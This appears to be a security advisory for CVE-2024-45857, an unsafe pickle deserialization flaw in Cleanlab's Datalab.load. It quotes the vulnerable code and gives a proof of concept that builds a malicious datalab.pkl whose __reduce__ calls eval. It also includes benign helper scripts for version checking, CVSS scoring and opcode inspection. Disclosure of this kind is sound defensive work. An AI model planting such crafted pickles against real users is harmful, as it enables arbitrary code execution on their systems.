Cleanlab
Vulnerability Report

Unsafe deserialization in Datalab leads to arbitrary code execution

CVE Number

CVE-2024-45857

Summary

An arbitrary code execution vulnerability exists in the deserialize function of the _Serializer class in cleanlab/datalab/internal/serialize.py, part of the Datalab module. Exploitation requires a maliciously crafted datalab.pkl file to exist within the directory passed to the Datalab.load function; loading that directory executes arbitrary code on the system performing the load.

Products Impacted

This vulnerability exists in Cleanlab versions v2.4.0 and newer.
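To check whether an installed copy falls in the affected range, something like the following minimal sketch could be used. It assumes the distribution is installed under the name `cleanlab` and that its version string starts with dotted integers. `release_tuple`, `is_affected`, and `installed_cleanlab_is_affected` are hypothetical helpers written for this illustration, not part of Cleanlab.

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIRST_AFFECTED = (2, 4, 0)  # from the advisory: v2.4.0 or newer


def release_tuple(version_string):
    """Extract the leading dotted integers, e.g. 'v2.6.1.dev0' -> (2, 6, 1)."""
    match = re.match(r"v?(\d+(?:\.\d+)*)", version_string.strip())
    if match is None:
        raise ValueError(f"Unrecognized version string: {version_string!r}")
    parts = tuple(int(p) for p in match.group(1).split("."))
    # Pad short versions such as '2.4' so tuple comparison behaves as expected.
    return parts + (0,) * (3 - len(parts))


def is_affected(version_string):
    """True when the version is at or above the first affected release."""
    return release_tuple(version_string) >= FIRST_AFFECTED


def installed_cleanlab_is_affected():
    """Return True/False for the installed package, or None if it is absent."""
    try:
        return is_affected(version("cleanlab"))
    except PackageNotFoundError:
        return None
```

Pre-release suffixes are ignored by this parser, so a string such as `2.4.0rc1` is treated as `2.4.0`.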

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
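The score can be reproduced from the vector. The sketch below assumes the vector uses CVSS v3.1 base metrics (the advisory does not state the version) and takes its weights and rounding rule from the v3.1 specification. It handles only the unchanged-scope case (S:U), which is what this vector uses. `base_score` and `roundup` are names chosen for this illustration.

```python
import math

# CVSS v3.1 base metric weights for unchanged scope.
# Assumption: the advisory's vector is a v3.x vector.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, following the v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a vector with unchanged scope."""
    metrics = dict(part.split(":") for part in vector.split("/"))
    if metrics.get("S") != "U":
        raise ValueError("This sketch only handles unchanged scope (S:U)")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


score = base_score("AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H")
```

For this vector the impact term is about 5.87 and the exploitability term about 1.83, which sum to roughly 7.71 and round up to 7.8.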

CWE Categorization

CWE-502: Deserialization of Untrusted Data

Details

To exploit this vulnerability, an attacker would create a directory, place a malicious file called datalab.pkl in it, and send the directory to a victim user. When the victim loads the directory with Datalab.load, the vulnerable code is called. The vulnerability exists in the deserialize function of the _Serializer class in the cleanlab/datalab/internal/serialize.py file (shown below).

    @classmethod
    def deserialize(cls, path: str, data: Optional[Dataset] = None) -> Datalab:
        """Deserializes the datalab object from disk."""

        if not os.path.exists(path):
            raise ValueError(f"No folder found at specified path: {path}")

        with open(os.path.join(path, OBJECT_FILENAME), "rb") as f:
            datalab: Datalab = pickle.load(f)

        cls._validate_version(datalab)

        # Load the issues from disk.
        issues_path = os.path.join(path, ISSUES_FILENAME)
        if not hasattr(datalab.data_issues, "issues") and os.path.exists(issues_path):
            datalab.data_issues.issues = pd.read_csv(issues_path)

        issue_summary_path = os.path.join(path, ISSUE_SUMMARY_FILENAME)
        if not hasattr(datalab.data_issues, "issue_summary") and os.path.exists(issue_summary_path):
            datalab.data_issues.issue_summary = pd.read_csv(issue_summary_path)

        if data is not None:
            if hash(data) != hash(datalab._data):
                raise ValueError(
                    "Data has been modified since Lab was saved. "
                    "Cannot load Lab with modified data."
                )

            if len(data) != len(datalab.labels):
                raise ValueError(
                    f"Length of data ({len(data)}) does not match length of labels ({len(datalab.labels)})"
                )

            datalab._data = Data(data, datalab.task, datalab.label_name)
            datalab.data = datalab._data._data

        return datalab

The above code is called by the Datalab.load function shown below.

    @staticmethod
    def load(path: str, data: Optional[Dataset] = None) -> "Datalab":
        """Loads Datalab object from a previously saved folder.

        Parameters
        ----------
        `path` :
            Path to the folder previously specified in ``Datalab.save()``.

        `data` :
            The dataset used to originally construct the Datalab.
            Remember the dataset is not saved as part of the Datalab,
            you must save/load the data separately.

        Returns
        -------
        `datalab` :
            A Datalab object that is identical to the one originally saved.
        """
        datalab = _Serializer.deserialize(path=path, data=data)
        load_message = f"Datalab loaded from folder: {path}"
        print(load_message)
        return datalab

When the user loads a directory containing the maliciously crafted pickle file, the code shown above calls the deserialize class method of _Serializer, which opens the datalab.pkl file in that directory and passes it to pickle.load without any validation. The version check runs only after pickle.load has returned, so it cannot prevent the payload from executing. An example attack can be seen below, where we first create our exploit directory with the malicious pickle file.

import os
import pickle

class Exploit:
    def __reduce__(self):
        # pickle.load calls eval with this argument while rebuilding the object
        return (eval, ("print('pwned')",))

# Create the directory that will be sent to the victim
os.makedirs("./exploit", exist_ok=True)
with open("./exploit/datalab.pkl", "wb") as f:
    f.write(pickle.dumps(Exploit()))
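A pickle of this kind can be examined without executing it. The sketch below uses the standard-library `pickletools.genops` to list the opcodes and string arguments in a payload. A `REDUCE` opcode together with a global lookup (`GLOBAL` or `STACK_GLOBAL`) means that loading the data will call an imported callable. `HarmlessPayload` and `summarize_pickle` are illustrative names, and `print` stands in for `eval` so the payload is benign. Ordinary pickles of class instances can contain the same opcodes, so this is an inspection aid rather than a detector.

```python
import pickle
import pickletools


class HarmlessPayload:
    """Benign stand-in: same shape as the exploit, but only calls print."""

    def __reduce__(self):
        return (print, ("pwned",))


def summarize_pickle(payload):
    """Return (opcode names, string arguments) without unpickling anything."""
    opcode_names = []
    strings = []
    for opcode, arg, _position in pickletools.genops(payload):
        opcode_names.append(opcode.name)
        if isinstance(arg, str):
            strings.append(arg)
    return opcode_names, strings


payload = pickle.dumps(HarmlessPayload())
names, strings = summarize_pickle(payload)

# True when the stream both looks up a global and calls something.
calls_a_global = "REDUCE" in names and bool({"GLOBAL", "STACK_GLOBAL"} & set(names))
```

The `strings` list exposes the module and function names the payload would resolve, as well as the argument that would be passed to the callable.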

Once the file has been created, the vulnerability can be exploited by having the user load the malicious directory:

from cleanlab import Datalab

Datalab.load("./exploit")

Once the user runs this, the arbitrary code will be executed on the system.
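The same chain can be reproduced without installing Cleanlab. In the sketch below, `load_like_datalab` is a hypothetical stand-in that mirrors only the path check, file lookup, and `pickle.load` call from `deserialize`. `HarmlessPayload` replaces the attacker's code with a call to `os.mkdir` that creates an empty marker directory, so the side effect is observable but benign.

```python
import os
import pickle
import tempfile

OBJECT_FILENAME = "datalab.pkl"  # file name used by the proof of concept


class HarmlessPayload:
    """Benign stand-in for the exploit: creates a marker directory on load."""

    def __init__(self, marker):
        self.marker = marker

    def __reduce__(self):
        # pickle.load will call os.mkdir(marker) while rebuilding the object.
        return (os.mkdir, (self.marker,))


def load_like_datalab(path):
    """Hypothetical stand-in for the lookup and pickle.load in deserialize."""
    if not os.path.exists(path):
        raise ValueError(f"No folder found at specified path: {path}")
    with open(os.path.join(path, OBJECT_FILENAME), "rb") as f:
        return pickle.load(f)


with tempfile.TemporaryDirectory() as workdir:
    folder = os.path.join(workdir, "exploit")
    marker = os.path.join(workdir, "marker")
    os.mkdir(folder)

    # Attacker side: write the crafted file into the directory.
    with open(os.path.join(folder, OBJECT_FILENAME), "wb") as f:
        pickle.dump(HarmlessPayload(marker), f)

    # Victim side: merely loading the directory runs the embedded call.
    marker_before = os.path.exists(marker)
    loaded = load_like_datalab(folder)
    marker_after = os.path.exists(marker)
```

The marker directory appears as a side effect of loading, and the value returned by the loader is whatever the embedded callable returned (here `None`), not a Datalab object.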

Timeline

July 11, 2024: Vendor disclosure via the process outlined on the vendor's security page

September 6, 2024: Followed up with the vendor to let them know we planned to publish on September 12, 2024

September 12, 2024: Public disclosure

Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer